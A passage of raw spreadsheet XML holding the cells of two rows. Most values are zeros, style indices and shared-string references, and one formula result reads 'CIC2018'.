      <c r="JL76" s="102">
        <v>0</v>
      </c>
      <c r="JM76" s="103">
        <v>0</v>
      </c>
      <c r="JN76" s="103">
        <v>0</v>
      </c>
      <c r="JO76" s="104">
        <v>0</v>
      </c>
      <c r="JP76" s="105">
        <v>0</v>
      </c>
      <c r="JQ76" s="106">
        <v>0</v>
      </c>
      <c r="JR76" s="497">
        <v>0</v>
      </c>
      <c r="JS76" s="107">
        <v>0</v>
      </c>
      <c r="JT76" s="107">
        <v>0</v>
      </c>
      <c r="JU76" s="108">
        <v>0</v>
      </c>
      <c r="JV76" s="109">
        <v>0</v>
      </c>
      <c r="JW76" s="110">
        <v>0</v>
      </c>
      <c r="JX76" s="501">
        <v>0</v>
      </c>
      <c r="JY76" s="111">
        <v>0</v>
      </c>
      <c r="JZ76" s="111">
        <v>0</v>
      </c>
      <c r="KA76" s="112">
        <v>0</v>
      </c>
      <c r="KB76" s="113">
        <v>0</v>
      </c>
      <c r="KC76" s="114">
        <v>0</v>
      </c>
      <c r="KD76" s="503">
        <v>0</v>
      </c>
      <c r="KE76" s="115">
        <v>0</v>
      </c>
      <c r="KF76" s="115">
        <v>0</v>
      </c>
      <c r="KG76" s="116">
        <v>0</v>
      </c>
      <c r="KH76" s="250">
        <v>0</v>
      </c>
      <c r="KI76" s="251">
        <v>0</v>
      </c>
      <c r="KJ76" s="505">
        <v>0</v>
      </c>
      <c r="KK76" s="252">
        <v>0</v>
      </c>
      <c r="KL76" s="252">
        <v>0</v>
      </c>
      <c r="KM76" s="253">
        <v>0</v>
      </c>
      <c r="KN76" s="101">
        <v>0</v>
      </c>
      <c r="KO76" s="102">
        <v>0</v>
      </c>
      <c r="KP76" s="102">
        <v>0</v>
      </c>
      <c r="KQ76" s="103">
        <v>0</v>
      </c>
      <c r="KR76" s="103">
        <v>0</v>
      </c>
      <c r="KS76" s="104">
        <v>0</v>
      </c>
      <c r="KT76" s="105">
        <v>0</v>
      </c>
      <c r="KU76" s="106">
        <v>0</v>
      </c>
      <c r="KV76" s="497">
        <v>0</v>
      </c>
      <c r="KW76" s="107">
        <v>0</v>
      </c>
      <c r="KX76" s="107">
        <v>0</v>
      </c>
      <c r="KY76" s="108">
        <v>0</v>
      </c>
      <c r="KZ76" s="109">
        <v>0</v>
      </c>
      <c r="LA76" s="110">
        <v>0</v>
      </c>
      <c r="LB76" s="501">
        <v>0</v>
      </c>
      <c r="LC76" s="111">
        <v>0</v>
      </c>
      <c r="LD76" s="111">
        <v>0</v>
      </c>
      <c r="LE76" s="112">
        <v>0</v>
      </c>
      <c r="LF76" s="113">
        <v>0</v>
      </c>
      <c r="LG76" s="114">
        <v>0</v>
      </c>
      <c r="LH76" s="503">
        <v>0</v>
      </c>
      <c r="LI76" s="115">
        <v>0</v>
      </c>
      <c r="LJ76" s="115">
        <v>0</v>
      </c>
      <c r="LK76" s="116">
        <v>0</v>
      </c>
      <c r="LL76" s="117">
        <v>0</v>
      </c>
      <c r="LM76" s="507">
        <v>0</v>
      </c>
      <c r="LN76" s="119">
        <v>0</v>
      </c>
      <c r="LO76" s="119">
        <v>0</v>
      </c>
      <c r="LP76" s="119">
        <v>0</v>
      </c>
      <c r="LQ76" s="119">
        <v>0</v>
      </c>
      <c r="LR76" s="119">
        <v>0</v>
      </c>
      <c r="LS76" s="119">
        <v>0</v>
      </c>
      <c r="LT76" s="382"/>
      <c r="LU76" s="117">
        <v>0</v>
      </c>
      <c r="LV76" s="118">
        <v>0</v>
      </c>
      <c r="LW76" s="507">
        <v>0</v>
      </c>
      <c r="LX76" s="119">
        <v>0</v>
      </c>
      <c r="LY76" s="119">
        <v>0</v>
      </c>
      <c r="LZ76" s="119">
        <v>0</v>
      </c>
      <c r="MA76" s="117">
        <v>0</v>
      </c>
      <c r="MB76" s="118">
        <v>0</v>
      </c>
      <c r="MC76" s="507">
        <v>0</v>
      </c>
      <c r="MD76" s="119">
        <v>0</v>
      </c>
      <c r="ME76" s="119">
        <v>0</v>
      </c>
      <c r="MF76" s="119">
        <v>0</v>
      </c>
      <c r="MG76" s="117">
        <v>0</v>
      </c>
      <c r="MH76" s="118">
        <v>0</v>
      </c>
      <c r="MI76" s="507">
        <v>0</v>
      </c>
      <c r="MJ76" s="119">
        <v>0</v>
      </c>
      <c r="MK76" s="119">
        <v>0</v>
      </c>
      <c r="ML76" s="119">
        <v>0</v>
      </c>
      <c r="MM76" s="117">
        <v>0</v>
      </c>
      <c r="MN76" s="118">
        <v>0</v>
      </c>
      <c r="MO76" s="507">
        <v>0</v>
      </c>
      <c r="MP76" s="119">
        <v>0</v>
      </c>
      <c r="MQ76" s="119">
        <v>0</v>
      </c>
      <c r="MR76" s="119">
        <v>0</v>
      </c>
      <c r="MS76" s="117">
        <v>0</v>
      </c>
      <c r="MT76" s="118">
        <v>0</v>
      </c>
      <c r="MU76" s="507">
        <v>0</v>
      </c>
      <c r="MV76" s="119">
        <v>0</v>
      </c>
      <c r="MW76" s="119">
        <v>0</v>
      </c>
      <c r="MX76" s="119">
        <v>0</v>
      </c>
      <c r="MY76" s="117">
        <v>0</v>
      </c>
      <c r="MZ76" s="118">
        <v>0</v>
      </c>
      <c r="NA76" s="507">
        <v>0</v>
      </c>
      <c r="NB76" s="119">
        <v>0</v>
      </c>
      <c r="NC76" s="119">
        <v>0</v>
      </c>
      <c r="ND76" s="119">
        <v>0</v>
      </c>
      <c r="NE76" s="117">
        <v>0</v>
      </c>
      <c r="NF76" s="118">
        <v>0</v>
      </c>
      <c r="NG76" s="507">
        <v>0</v>
      </c>
      <c r="NH76" s="119">
        <v>0</v>
      </c>
      <c r="NI76" s="119">
        <v>0</v>
      </c>
      <c r="NJ76" s="119">
        <v>0</v>
      </c>
      <c r="NK76" s="117">
        <v>0</v>
      </c>
      <c r="NL76" s="118">
        <v>0</v>
      </c>
      <c r="NM76" s="507">
        <v>0</v>
      </c>
      <c r="NN76" s="119">
        <v>0</v>
      </c>
      <c r="NO76" s="119">
        <v>0</v>
      </c>
      <c r="NP76" s="119">
        <v>0</v>
      </c>
      <c r="NQ76" s="117">
        <v>0</v>
      </c>
      <c r="NR76" s="118">
        <v>0</v>
      </c>
      <c r="NS76" s="507">
        <v>0</v>
      </c>
      <c r="NT76" s="119">
        <v>0</v>
      </c>
      <c r="NU76" s="119">
        <v>0</v>
      </c>
      <c r="NV76" s="119">
        <v>0</v>
      </c>
      <c r="NW76" s="117">
        <v>0</v>
      </c>
      <c r="NX76" s="118">
        <v>0</v>
      </c>
      <c r="NY76" s="507">
        <v>0</v>
      </c>
      <c r="NZ76" s="119">
        <v>0</v>
      </c>
      <c r="OA76" s="119">
        <v>0</v>
      </c>
      <c r="OB76" s="119">
        <v>0</v>
      </c>
      <c r="OC76" s="120">
        <v>0</v>
      </c>
      <c r="OD76" s="120">
        <v>0</v>
      </c>
      <c r="OE76" s="120">
        <v>0</v>
      </c>
      <c r="OF76" s="121">
        <v>0</v>
      </c>
      <c r="OG76" s="120">
        <v>0</v>
      </c>
      <c r="OH76" s="120">
        <v>0</v>
      </c>
      <c r="OI76" s="120">
        <v>0</v>
      </c>
      <c r="OJ76" s="120">
        <v>0</v>
      </c>
      <c r="OK76" s="383"/>
      <c r="OL76" s="120">
        <v>0</v>
      </c>
      <c r="OM76" s="120">
        <v>0</v>
      </c>
      <c r="ON76" s="120">
        <v>0</v>
      </c>
      <c r="OO76" s="120"/>
      <c r="OP76" s="120">
        <v>0</v>
      </c>
      <c r="OQ76" s="464">
        <v>0</v>
      </c>
      <c r="OR76" s="120">
        <v>0</v>
      </c>
      <c r="OS76" s="120">
        <v>0</v>
      </c>
      <c r="OT76" s="120">
        <v>0</v>
      </c>
      <c r="OU76" s="120"/>
      <c r="OV76" s="120">
        <v>0</v>
      </c>
      <c r="OW76" s="464">
        <v>0</v>
      </c>
      <c r="OX76" s="120">
        <v>0</v>
      </c>
      <c r="OY76" s="120">
        <v>0</v>
      </c>
      <c r="OZ76" s="120">
        <v>0</v>
      </c>
      <c r="PA76" s="120"/>
      <c r="PB76" s="120">
        <v>0</v>
      </c>
      <c r="PC76" s="464">
        <v>0</v>
      </c>
      <c r="PD76" s="120">
        <v>0</v>
      </c>
      <c r="PE76" s="120">
        <v>0</v>
      </c>
      <c r="PF76" s="120">
        <v>0</v>
      </c>
      <c r="PG76" s="120"/>
      <c r="PH76" s="120">
        <v>0</v>
      </c>
      <c r="PI76" s="464">
        <v>0</v>
      </c>
      <c r="PJ76" s="120">
        <v>0</v>
      </c>
      <c r="PK76" s="120">
        <v>0</v>
      </c>
      <c r="PL76" s="120">
        <v>0</v>
      </c>
      <c r="PM76" s="120"/>
      <c r="PN76" s="120">
        <v>0</v>
      </c>
      <c r="PO76" s="464">
        <v>0</v>
      </c>
      <c r="PP76" s="120">
        <v>0</v>
      </c>
      <c r="PQ76" s="120">
        <v>0</v>
      </c>
      <c r="PR76" s="120">
        <v>0</v>
      </c>
      <c r="PS76" s="120"/>
      <c r="PT76" s="120">
        <v>0</v>
      </c>
      <c r="PU76" s="464">
        <v>0</v>
      </c>
      <c r="PV76" s="120">
        <v>0</v>
      </c>
      <c r="PW76" s="120">
        <v>0</v>
      </c>
      <c r="PX76" s="120">
        <v>0</v>
      </c>
      <c r="PY76" s="120"/>
      <c r="PZ76" s="120">
        <v>0</v>
      </c>
      <c r="QA76" s="464">
        <v>0</v>
      </c>
      <c r="QB76" s="120">
        <v>0</v>
      </c>
      <c r="QC76" s="120">
        <v>0</v>
      </c>
      <c r="QD76" s="120">
        <v>0</v>
      </c>
      <c r="QE76" s="120"/>
      <c r="QF76" s="120">
        <v>0</v>
      </c>
      <c r="QG76" s="464">
        <v>0</v>
      </c>
      <c r="QH76" s="120">
        <v>0</v>
      </c>
      <c r="QI76" s="120">
        <v>0</v>
      </c>
      <c r="QJ76" s="120">
        <v>0</v>
      </c>
      <c r="QK76" s="120"/>
      <c r="QL76" s="120">
        <v>0</v>
      </c>
      <c r="QM76" s="464">
        <v>0</v>
      </c>
      <c r="QN76" s="120">
        <v>0</v>
      </c>
      <c r="QO76" s="120">
        <v>0</v>
      </c>
      <c r="QP76" s="120">
        <v>0</v>
      </c>
      <c r="QQ76" s="120"/>
      <c r="QR76" s="120">
        <v>0</v>
      </c>
      <c r="QS76" s="464">
        <v>0</v>
      </c>
      <c r="QT76" s="184"/>
      <c r="QU76" s="184"/>
      <c r="QV76" s="184"/>
      <c r="QW76" s="184"/>
      <c r="QX76" s="184"/>
      <c r="QY76" s="184"/>
      <c r="QZ76" s="184"/>
      <c r="RA76" s="184"/>
      <c r="RB76" s="184"/>
      <c r="RC76" s="184"/>
      <c r="RD76" s="184"/>
      <c r="RE76" s="184"/>
      <c r="RF76" s="184"/>
      <c r="RG76" s="184"/>
      <c r="RH76" s="184"/>
      <c r="RI76" s="184"/>
      <c r="RJ76" s="184"/>
      <c r="RK76" s="184"/>
      <c r="RL76" s="184"/>
      <c r="RM76" s="184"/>
      <c r="RN76" s="184"/>
      <c r="RO76" s="184"/>
      <c r="RP76" s="184"/>
      <c r="RQ76" s="184"/>
      <c r="RR76" s="184"/>
      <c r="RS76" s="184"/>
      <c r="RT76" s="184"/>
      <c r="RU76" s="184"/>
      <c r="RV76" s="184"/>
      <c r="RW76" s="184"/>
      <c r="RX76" s="184"/>
      <c r="RY76" s="184"/>
      <c r="RZ76" s="184"/>
      <c r="SA76" s="184"/>
      <c r="SB76" s="184"/>
      <c r="SC76" s="184"/>
      <c r="SD76" s="184"/>
      <c r="SE76" s="184"/>
      <c r="SF76" s="184"/>
      <c r="SG76" s="184"/>
      <c r="SH76" s="184"/>
      <c r="SI76" s="184"/>
      <c r="SJ76" s="184"/>
      <c r="SK76" s="184"/>
      <c r="SL76" s="184"/>
      <c r="SM76" s="184"/>
      <c r="SN76" s="184"/>
      <c r="SO76" s="184"/>
      <c r="SP76" s="184"/>
      <c r="SQ76" s="184"/>
      <c r="SR76" s="184"/>
      <c r="SS76" s="184"/>
      <c r="ST76" s="184"/>
      <c r="SU76" s="184"/>
      <c r="SV76" s="184"/>
      <c r="SW76" s="184"/>
      <c r="SX76" s="184"/>
      <c r="SY76" s="184"/>
      <c r="SZ76" s="184"/>
      <c r="TA76" s="184"/>
      <c r="TB76" s="184"/>
      <c r="TC76" s="184"/>
      <c r="TD76" s="184"/>
      <c r="TE76" s="184"/>
      <c r="TF76" s="184"/>
      <c r="TG76" s="184"/>
      <c r="TH76" s="184"/>
      <c r="TI76" s="184"/>
      <c r="TJ76" s="184"/>
      <c r="TK76" s="184"/>
      <c r="TL76" s="184"/>
      <c r="TM76" s="184"/>
      <c r="TN76" s="184"/>
      <c r="TO76" s="184"/>
      <c r="TP76" s="184"/>
      <c r="TQ76" s="184"/>
      <c r="TR76" s="184"/>
      <c r="TS76" s="184"/>
      <c r="TT76" s="184"/>
      <c r="TU76" s="184"/>
      <c r="TV76" s="184"/>
      <c r="TW76" s="184"/>
      <c r="TX76" s="184"/>
      <c r="TY76" s="184"/>
      <c r="TZ76" s="184"/>
      <c r="UA76" s="184"/>
      <c r="UB76" s="184"/>
      <c r="UC76" s="184"/>
      <c r="UD76" s="184"/>
      <c r="UE76" s="184"/>
      <c r="UF76" s="184"/>
      <c r="UG76" s="184"/>
      <c r="UH76" s="184"/>
      <c r="UI76" s="184"/>
      <c r="UJ76" s="184"/>
      <c r="UK76" s="184"/>
      <c r="UL76" s="184"/>
      <c r="UM76" s="184"/>
      <c r="UN76" s="184"/>
      <c r="UO76" s="184"/>
      <c r="UP76" s="184"/>
      <c r="UQ76" s="184"/>
      <c r="UR76" s="184"/>
      <c r="US76" s="184"/>
      <c r="UT76" s="184"/>
      <c r="UU76" s="184"/>
      <c r="UV76" s="184"/>
      <c r="UW76" s="184"/>
      <c r="UX76" s="184"/>
      <c r="UY76" s="184"/>
      <c r="UZ76" s="184"/>
      <c r="VA76" s="184"/>
      <c r="VB76" s="184"/>
      <c r="VC76" s="184"/>
      <c r="VD76" s="184"/>
      <c r="VE76" s="184"/>
      <c r="VF76" s="184"/>
      <c r="VG76" s="184"/>
      <c r="VH76" s="184"/>
      <c r="VI76" s="184"/>
      <c r="VJ76" s="184"/>
      <c r="VK76" s="184"/>
      <c r="VL76" s="184"/>
      <c r="VM76" s="184"/>
      <c r="VN76" s="184"/>
      <c r="VO76" s="184"/>
      <c r="VP76" s="184"/>
      <c r="VQ76" s="184"/>
      <c r="VR76" s="184"/>
      <c r="VS76" s="184"/>
      <c r="VT76" s="184"/>
      <c r="VU76" s="184"/>
      <c r="VV76" s="184"/>
      <c r="VW76" s="184"/>
      <c r="VX76" s="184"/>
      <c r="VY76" s="184"/>
    </row>
    <row r="77" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A77" s="82" t="s">
        <v>107</v>
      </c>
      <c r="B77" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C77" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D77" s="83" t="s">
        <v>114</v>
      </c>
      <c r="E77" s="83">
        <f t="shared" si="5"/>
        <v>48</v>
      </c>
      <c r="F77" s="83" t="s">
        <v>115</v>
      </c>
      <c r="G77" s="94" t="s">
        <v>1354</v>
      </c>
      <c r="H77" s="83" t="s">
        <v>1355</v>
      </c>
      <c r="I77" s="81" t="s">
        <v>1409</v>
      </c>
      <c r="J77" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K77" s="81" t="s">
        <v>1410</v>
      </c>
      <c r="L77" s="81" t="s">
        <v>1411</v>
      </c>
      <c r="M77" s="378" t="s">
        <v>277</v>
      </c>
      <c r="N77" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O77" s="485" t="str">
        <f t="shared" si="4"/>
        <v>CIC2018</v>
      </c>
      <c r="P77" s="91"/>
      <c r="Q77" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R77" s="92" t="s">
        <v>1412</v>
      </c>
      <c r="S77" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T77" s="92" t="s">
        <v>1413</v>
      </c>
      <c r="U77" s="94" t="s">
        <v>1414</v>
      </c>
      <c r="V77" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W77" s="96" t="s">
        <v>1320</v>
      </c>
      <c r="X77" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y77" s="83" t="s">
        <v>1408</v>
      </c>
      <c r="Z77" s="98" t="s">
        <v>1374</v>
      </c>
      <c r="AA77" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB77" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC77" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD77" s="83"/>
      <c r="AE77" s="83"/>
      <c r="AF77" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG77" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH77" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI77" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ77" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK77" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL77" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM77" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN77" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO77" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP77" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ77" s="646">
        <v>6979</v>
      </c>
      <c r="AR77" s="647"/>
      <c r="AS77" s="647">
        <v>5905</v>
      </c>
      <c r="AT77" s="647">
        <v>0</v>
      </c>
      <c r="AU77" s="647">
        <v>5905</v>
      </c>
      <c r="AV77" s="650" t="s">
        <v>4</v>
      </c>
      <c r="AW77" s="647">
        <v>5905</v>
      </c>
      <c r="AX77" s="647">
        <v>5905</v>
      </c>
      <c r="AY77" s="647">
        <v>0</v>
      </c>
      <c r="AZ77" s="647">
        <v>5905</v>
      </c>
      <c r="BA77" s="381" t="s">
        <v>4898</v>
      </c>
      <c r="BB77" s="101">
        <v>1164</v>
      </c>
      <c r="BC77" s="102" t="s">
        <v>2035</v>
      </c>
      <c r="BD77" s="102">
        <v>293</v>
      </c>
      <c r="BE77" s="103" t="s">
        <v>2036</v>
      </c>
      <c r="BF77" s="103">
        <v>2</v>
      </c>
      <c r="BG77" s="104">
        <v>279</v>
      </c>
      <c r="BH77" s="105">
        <v>0</v>
      </c>
      <c r="BI77" s="106">
        <v>0</v>
      </c>
      <c r="BJ77" s="497">
        <v>0</v>
      </c>
      <c r="BK77" s="107">
        <v>0</v>
      </c>
      <c r="BL77" s="107">
        <v>0</v>
      </c>
      <c r="BM77" s="108">
        <v>0</v>
      </c>
      <c r="BN77" s="109">
        <v>1164</v>
      </c>
      <c r="BO77" s="110" t="s">
        <v>2035</v>
      </c>
      <c r="BP77" s="501">
        <v>293</v>
      </c>
      <c r="BQ77" s="111" t="s">
        <v>2036</v>
      </c>
      <c r="BR77" s="111">
        <v>2</v>
      </c>
      <c r="BS77" s="112">
        <v>279</v>
      </c>
      <c r="BT77" s="113">
        <v>6512</v>
      </c>
      <c r="BU77" s="114" t="s">
        <v>3519</v>
      </c>
      <c r="BV77" s="503">
        <v>5641</v>
      </c>
      <c r="BW77" s="115" t="s">
        <v>3520</v>
      </c>
      <c r="BX77" s="115">
        <v>5</v>
      </c>
      <c r="BY77" s="116">
        <v>4832</v>
      </c>
      <c r="BZ77" s="250">
        <v>7</v>
      </c>
      <c r="CA77" s="251" t="s">
        <v>1916</v>
      </c>
      <c r="CB77" s="505">
        <v>7</v>
      </c>
      <c r="CC77" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="CD77" s="252">
        <v>1</v>
      </c>
      <c r="CE77" s="253">
        <v>7</v>
      </c>
      <c r="CF77" s="101">
        <v>6519</v>
      </c>
      <c r="CG77" s="102" t="s">
        <v>2107</v>
      </c>
      <c r="CH77" s="102">
        <v>5648</v>
      </c>
      <c r="CI77" s="103" t="s">
        <v>2108</v>
      </c>
      <c r="CJ77" s="103">
        <v>6</v>
      </c>
      <c r="CK77" s="104">
        <v>4834</v>
      </c>
      <c r="CL77" s="105">
        <v>0</v>
      </c>
      <c r="CM77" s="106">
        <v>0</v>
      </c>
      <c r="CN77" s="497">
        <v>0</v>
      </c>
      <c r="CO77" s="107">
        <v>0</v>
      </c>
      <c r="CP77" s="107">
        <v>0</v>
      </c>
      <c r="CQ77" s="108">
        <v>0</v>
      </c>
      <c r="CR77" s="109">
        <v>0</v>
      </c>
      <c r="CS77" s="110">
        <v>0</v>
      </c>
      <c r="CT77" s="501">
        <v>0</v>
      </c>
      <c r="CU77" s="111">
        <v>0</v>
      </c>
      <c r="CV77" s="111">
        <v>0</v>
      </c>
      <c r="CW77" s="112">
        <v>0</v>
      </c>
      <c r="CX77" s="113">
        <v>1164</v>
      </c>
      <c r="CY77" s="114" t="s">
        <v>2035</v>
      </c>
      <c r="CZ77" s="503">
        <v>293</v>
      </c>
      <c r="DA77" s="115" t="s">
        <v>2036</v>
      </c>
      <c r="DB77" s="115">
        <v>2</v>
      </c>
      <c r="DC77" s="116">
        <v>279</v>
      </c>
      <c r="DD77" s="101">
        <v>0</v>
      </c>
      <c r="DE77" s="102">
        <v>0</v>
      </c>
      <c r="DF77" s="102">
        <v>0</v>
      </c>
      <c r="DG77" s="103">
        <v>0</v>
      </c>
      <c r="DH77" s="103">
        <v>0</v>
      </c>
      <c r="DI77" s="104">
        <v>0</v>
      </c>
      <c r="DJ77" s="105">
        <v>0</v>
      </c>
      <c r="DK77" s="106">
        <v>0</v>
      </c>
      <c r="DL77" s="497">
        <v>0</v>
      </c>
      <c r="DM77" s="107">
        <v>0</v>
      </c>
      <c r="DN77" s="107">
        <v>0</v>
      </c>
      <c r="DO77" s="108">
        <v>0</v>
      </c>
      <c r="DP77" s="109">
        <v>0</v>
      </c>
      <c r="DQ77" s="110">
        <v>0</v>
      </c>
      <c r="DR77" s="501">
        <v>0</v>
      </c>
      <c r="DS77" s="111">
        <v>0</v>
      </c>
      <c r="DT77" s="111">
        <v>0</v>
      </c>
      <c r="DU77" s="112">
        <v>0</v>
      </c>
      <c r="DV77" s="113">
        <v>526</v>
      </c>
      <c r="DW77" s="114" t="s">
        <v>3521</v>
      </c>
      <c r="DX77" s="503">
        <v>526</v>
      </c>
      <c r="DY77" s="115" t="s">
        <v>3522</v>
      </c>
      <c r="DZ77" s="115">
        <v>2</v>
      </c>
      <c r="EA77" s="116">
        <v>279</v>
      </c>
      <c r="EB77" s="250">
        <v>0</v>
      </c>
      <c r="EC77" s="251">
        <v>0</v>
      </c>
      <c r="ED77" s="505">
        <v>0</v>
      </c>
      <c r="EE77" s="252">
        <v>0</v>
      </c>
      <c r="EF77" s="252">
        <v>0</v>
      </c>
      <c r="EG77" s="253">
        <v>0</v>
      </c>
      <c r="EH77" s="101">
        <v>526</v>
      </c>
      <c r="EI77" s="102" t="s">
        <v>3521</v>
      </c>
      <c r="EJ77" s="102">
        <v>526</v>
      </c>
      <c r="EK77" s="103" t="s">
        <v>3522</v>
      </c>
      <c r="EL77" s="103">
        <v>2</v>
      </c>
      <c r="EM77" s="104">
        <v>279</v>
      </c>
      <c r="EN77" s="105">
        <v>0</v>
      </c>
      <c r="EO77" s="106">
        <v>0</v>
      </c>
      <c r="EP77" s="497">
        <v>0</v>
      </c>
      <c r="EQ77" s="107">
        <v>0</v>
      </c>
      <c r="ER77" s="107">
        <v>0</v>
      </c>
      <c r="ES77" s="108">
        <v>0</v>
      </c>
      <c r="ET77" s="109">
        <v>0</v>
      </c>
      <c r="EU77" s="110">
        <v>0</v>
      </c>
      <c r="EV77" s="501">
        <v>0</v>
      </c>
      <c r="EW77" s="111">
        <v>0</v>
      </c>
      <c r="EX77" s="111">
        <v>0</v>
      </c>
      <c r="EY77" s="112">
        <v>0</v>
      </c>
      <c r="EZ77" s="113">
        <v>0</v>
      </c>
      <c r="FA77" s="114">
        <v>0</v>
      </c>
      <c r="FB77" s="503">
        <v>0</v>
      </c>
      <c r="FC77" s="115">
        <v>0</v>
      </c>
      <c r="FD77" s="115">
        <v>0</v>
      </c>
      <c r="FE77" s="116">
        <v>0</v>
      </c>
      <c r="FF77" s="101">
        <v>1164</v>
      </c>
      <c r="FG77" s="102" t="s">
        <v>2035</v>
      </c>
      <c r="FH77" s="102">
        <v>293</v>
      </c>
      <c r="FI77" s="103" t="s">
        <v>2036</v>
      </c>
      <c r="FJ77" s="103">
        <v>2</v>
      </c>
      <c r="FK77" s="104">
        <v>279</v>
      </c>
      <c r="FL77" s="105">
        <v>0</v>
      </c>
      <c r="FM77" s="106">
        <v>0</v>
      </c>
      <c r="FN77" s="497">
        <v>0</v>
      </c>
      <c r="FO77" s="107">
        <v>0</v>
      </c>
      <c r="FP77" s="107">
        <v>0</v>
      </c>
      <c r="FQ77" s="108">
        <v>0</v>
      </c>
      <c r="FR77" s="109">
        <v>1164</v>
      </c>
      <c r="FS77" s="110" t="s">
        <v>2035</v>
      </c>
      <c r="FT77" s="501">
        <v>293</v>
      </c>
      <c r="FU77" s="111" t="s">
        <v>2036</v>
      </c>
      <c r="FV77" s="111">
        <v>2</v>
      </c>
      <c r="FW77" s="112">
        <v>279</v>
      </c>
      <c r="FX77" s="113">
        <v>5986</v>
      </c>
      <c r="FY77" s="114" t="s">
        <v>3523</v>
      </c>
      <c r="FZ77" s="503">
        <v>5115</v>
      </c>
      <c r="GA77" s="115" t="s">
        <v>3524</v>
      </c>
      <c r="GB77" s="115">
        <v>3</v>
      </c>
      <c r="GC77" s="116">
        <v>4832</v>
      </c>
      <c r="GD77" s="250">
        <v>7</v>
      </c>
      <c r="GE77" s="251" t="s">
        <v>1916</v>
      </c>
      <c r="GF77" s="505">
        <v>7</v>
      </c>
      <c r="GG77" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="GH77" s="252">
        <v>1</v>
      </c>
      <c r="GI77" s="253">
        <v>7</v>
      </c>
      <c r="GJ77" s="101">
        <v>5993</v>
      </c>
      <c r="GK77" s="102" t="s">
        <v>3525</v>
      </c>
      <c r="GL77" s="102">
        <v>5122</v>
      </c>
      <c r="GM77" s="103" t="s">
        <v>3526</v>
      </c>
      <c r="GN77" s="103">
        <v>4</v>
      </c>
      <c r="GO77" s="104">
        <v>4834</v>
      </c>
      <c r="GP77" s="105">
        <v>0</v>
      </c>
      <c r="GQ77" s="106">
        <v>0</v>
      </c>
      <c r="GR77" s="497">
        <v>0</v>
      </c>
      <c r="GS77" s="107">
        <v>0</v>
      </c>
      <c r="GT77" s="107">
        <v>0</v>
      </c>
      <c r="GU77" s="108">
        <v>0</v>
      </c>
      <c r="GV77" s="109">
        <v>0</v>
      </c>
      <c r="GW77" s="110">
        <v>0</v>
      </c>
      <c r="GX77" s="501">
        <v>0</v>
      </c>
      <c r="GY77" s="111">
        <v>0</v>
      </c>
      <c r="GZ77" s="111">
        <v>0</v>
      </c>
      <c r="HA77" s="112">
        <v>0</v>
      </c>
      <c r="HB77" s="113">
        <v>1164</v>
      </c>
      <c r="HC77" s="114" t="s">
        <v>2035</v>
      </c>
      <c r="HD77" s="503">
        <v>293</v>
      </c>
      <c r="HE77" s="115" t="s">
        <v>2036</v>
      </c>
      <c r="HF77" s="115">
        <v>2</v>
      </c>
      <c r="HG77" s="116">
        <v>279</v>
      </c>
      <c r="HH77" s="101">
        <v>0</v>
      </c>
      <c r="HI77" s="102">
        <v>0</v>
      </c>
      <c r="HJ77" s="102">
        <v>0</v>
      </c>
      <c r="HK77" s="103">
        <v>0</v>
      </c>
      <c r="HL77" s="103">
        <v>0</v>
      </c>
      <c r="HM77" s="104">
        <v>0</v>
      </c>
      <c r="HN77" s="105">
        <v>0</v>
      </c>
      <c r="HO77" s="106">
        <v>0</v>
      </c>
      <c r="HP77" s="497">
        <v>0</v>
      </c>
      <c r="HQ77" s="107">
        <v>0</v>
      </c>
      <c r="HR77" s="107">
        <v>0</v>
      </c>
      <c r="HS77" s="108">
        <v>0</v>
      </c>
      <c r="HT77" s="109">
        <v>0</v>
      </c>
      <c r="HU77" s="110">
        <v>0</v>
      </c>
      <c r="HV77" s="501">
        <v>0</v>
      </c>
      <c r="HW77" s="111">
        <v>0</v>
      </c>
      <c r="HX77" s="111">
        <v>0</v>
      </c>
      <c r="HY77" s="112">
        <v>0</v>
      </c>
      <c r="HZ77" s="113">
        <v>0</v>
      </c>
      <c r="IA77" s="114">
        <v>0</v>
      </c>
      <c r="IB77" s="503">
        <v>0</v>
      </c>
      <c r="IC77" s="115">
        <v>0</v>
      </c>
      <c r="ID77" s="115">
        <v>0</v>
      </c>
      <c r="IE77" s="116">
        <v>0</v>
      </c>
      <c r="IF77" s="250">
        <v>0</v>
      </c>
      <c r="IG77" s="251">
        <v>0</v>
      </c>
      <c r="IH77" s="505">
        <v>0</v>
      </c>
      <c r="II77" s="252">
        <v>0</v>
      </c>
      <c r="IJ77" s="252">
        <v>0</v>
      </c>
      <c r="IK77" s="253">
        <v>0</v>
      </c>
      <c r="IL77" s="101">
        <v>0</v>
      </c>
      <c r="IM77" s="102">
        <v>0</v>
      </c>
      <c r="IN77" s="102">
        <v>0</v>
      </c>
      <c r="IO77" s="103">
        <v>0</v>
      </c>
      <c r="IP77" s="103">
        <v>0</v>
      </c>
      <c r="IQ77" s="104">
        <v>0</v>
      </c>
      <c r="IR77" s="105">
        <v>0</v>
      </c>
      <c r="IS77" s="106">
        <v>0</v>
      </c>
      <c r="IT77" s="497">
        <v>0</v>
      </c>
      <c r="IU77" s="107">
        <v>0</v>
      </c>
      <c r="IV77" s="107">
        <v>0</v>
      </c>
      <c r="IW77" s="108">
        <v>0</v>
      </c>
      <c r="IX77" s="109">
        <v>0</v>
      </c>
